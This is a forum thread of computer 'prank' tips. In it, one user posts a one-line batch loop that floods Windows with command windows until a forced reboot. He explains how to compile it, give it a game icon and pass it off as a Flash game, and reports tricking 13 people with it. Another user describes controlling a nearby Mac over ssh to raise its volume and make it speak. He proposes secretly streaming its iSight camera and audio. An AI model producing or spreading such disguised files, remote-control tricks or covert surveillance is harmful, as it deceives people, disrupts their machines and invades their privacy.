Registered: 11/15/07
Posts: 1797
Loc: Florida, USA
Ever want to pull a prank on a PC user or a fellow mac user running XP on his mac? Well I doubt you want to hurt the computer so his a simple prank that only will cause a force restart or power off. Open Notepad and enter this code.
:1 start goto 1
Save it but as a BAT (BATCH) file. If you're really smart you could convert it to a exec file via bat2exec converter and add a game like icon and tell the victim it's a compiled flash game. When he/she runs the file the DOS command window will popup then another, then another etc etc etc... It will open up 200+ command prompt windows and use up 99% of the system resources and you can't do anything but a force reboot. The only way this would harm some one is if they have something important running like defrag or something.
HAHA, that was great. I have winXP in VirtualBox on my linux machine, so I made the file. Then I gave it to my friend who ran it on his dual core 2.0GHz AMD siempron laptop with 2GB ram. WOW that thing opens command prompt windows fast roflmao
Registered: 11/15/07
Posts: 1797
Loc: Florida, USA
Yes yes, I pulled this prank on 13 ppl so far. I compiled it as a EXEC file and gave it a icon and told them it's a flash game. I would watch them access the FTP and download it then with in 2 to 5 minutes they log out of AIM and get back on 2 minutes later cussing me out and asking if I loaded a virus on their system. Then I end up spending 30minutes explaining that it's a simple batch file that just reloops the command prompt window to open over and over.
I made mine with some ascii art that has a little quote from batman "Holy strawberry's batman, we're in a jam!" lol. With the added ascii art it makes the file bigger and more legit looking then a few bytes.
I found a nice simple Mac prank the other day which I tested with some success in our showroom. Log into a machine you can see (and preferably hear) via ssh when someone else is near it. You can make sure its volume is turned up using this terminal command:
sudo osascript -e "set Volume 10"
10 for max volume, 0 is mute.
You can then freak people out by using the 'say' command:
say "anything you like"
Its good fun when you get someone who is less of a geek and can't work out what is happening.
Next trick is to broadcast the AV from an iSight on the client over the network without showing the image on screen or playing the audio through internal speakers.
Registered: 11/15/07
Posts: 1797
Loc: Florida, USA
I just tricked a friend of mine. He alway's gloats about his system running for 4 months straight with out a reboot. I got him to try the program and he had to end up rebooting the computer.
Registered: 10/16/04
Posts: 586
Loc: Vancouver, BC Canada
the best thing you can do to any xp machine is shut it off and leave it that way.. just my opinion of course. I am forced to use the horror that is xp at work and I suffer each day because of it.
_________________________
Mac mini C2D 1.83GHz - 2GB RAM - 200GB 7200rpm HD Sawtooth w/G4 1GHz - 1GB RAM - SIIG SATA w/2x1TB HD B&W w/G4 600MHz - 1GB RAM - 2x80GB HD Sawtooth G4 400MHz - 512MB RAM - 40GB HD Dell Ultrasharp 2007WFP 20" Widescreen LCD 2.94TB Total Storage
Registered: 11/15/07
Posts: 1797
Loc: Florida, USA
Yea, I get to use a Unix based system at work Just wish the systems had more then 64MB of ram
MS screwed them selfs. I remember when MS made XENIX. It was a Unix like OS that was pretty much a copy of AT&T Unix. I think MS only made 3 kernel releases. They dropped it and now SCO owns the rights to XENIX and making a killing with their OS called OpenServer that is built off the XENIX kernel.